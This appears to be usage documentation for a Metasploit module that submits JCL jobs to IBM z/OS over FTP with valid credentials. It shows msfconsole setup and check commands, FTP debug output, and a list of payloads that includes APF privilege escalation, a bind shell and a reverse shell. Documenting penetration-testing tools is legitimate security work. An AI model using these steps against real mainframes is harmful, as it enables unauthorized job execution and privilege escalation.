z/OS JCL authorized FTP-base command execution - hints & tips
In order to use this exploit, you must have valid credentials on the target z/OS system. The credentials must have access to upload files via FTP. If in doubt, use the check function of the exploit.
Vulnerable Application
This exploit was tested on the ftp daemons for z/OS version 1.13 / 2.1
Payloads
If the exploit works, any JCL the user has rights to submit can be submitted.
See cmd type payloads under mainframe with jcl in the payload name, e.g.:
msf exploit(ftp_jcl_creds) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/mainframe/apf_privesc_jcl normal JCL to escalate privileges via APF LIB
cmd/mainframe/bind_shell_jcl normal Z/OS (MVS) Command Shell, Bind TCP
cmd/mainframe/generic_jcl normal Generic JCL Test for Mainframe Exploits
cmd/mainframe/reverse_shell_jcl normal Z/OS (MVS) Command Shell, Reverse TCP
Verification Steps
A successful check of the exploit will look like this:
msf exploit(ftp_jcl_creds) > set FTPUSER ftptest
FTPUSER => ftptest
msf exploit(ftp_jcl_creds) > set FTPPASS password
FTPPASS => password
msf exploit(ftp_jcl_creds) > set RHOST 10.10.10.1
RHOST => 10.10.10.1
msf exploit(ftp_jcl_creds) > info
Name: FTP JCL Execution
Module: exploit/mainframe/ftp/ftp_jcl_creds
Platform: Mainframe
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2013-05-12
Available targets:
Id Name
-- ----
0 auto
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS password no The password for the specified username
FTPUSER ftptest no The username to authenticate as
RHOST 10.10.10.1 yes The target address
RPORT 21 yes The target port
SLEEP 5 no Time to wait before checking if job has completed.
Payload information:
Description:
Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires
valid credentials on the target system
msf exploit(ftp_jcl_creds) > check
[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
Debugging
If the exploit or check is not working, turn on the VERBOSE and FTPDEBUG settings of the exploit and run. The output should look similar to the below, on a vulnerable system.
msf exploit(ftp_jcl_creds) > set FTPDEBUG true
FTPDEBUG => true
msf exploit(ftp_jcl_creds) > set VERBOSE true
VERBOSE => true
msf exploit(ftp_jcl_creds) > check
[*] 10.10.10.1:21 - Connecting to FTP server 10.10.10.1:21...
[*] 10.10.10.1:21 - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n"
[*] 10.10.10.1:21 - Connected to target FTP server.
[*] 10.10.10.1:21 - Authenticating as ftptest with password password...
[*] 10.10.10.1:21 - FTP send: "USER ftptest\r\n"
[*] 10.10.10.1:21 - FTP recv: "331 Send password please.\r\n"
[*] 10.10.10.1:21 - Sending password...
[*] 10.10.10.1:21 - FTP send: "PASS password\r\n"
[*] 10.10.10.1:21 - FTP recv: "230 FTPTEST is logged on. Working directory is \"FTPTEST.\".\r\n"
[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - FTP send: "site file=jes\r\n"
[*] 10.10.10.1:21 - FTP recv: "200 SITE command was accepted\r\n"
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
Notes
The job run will leave a joblog for the credentials used.
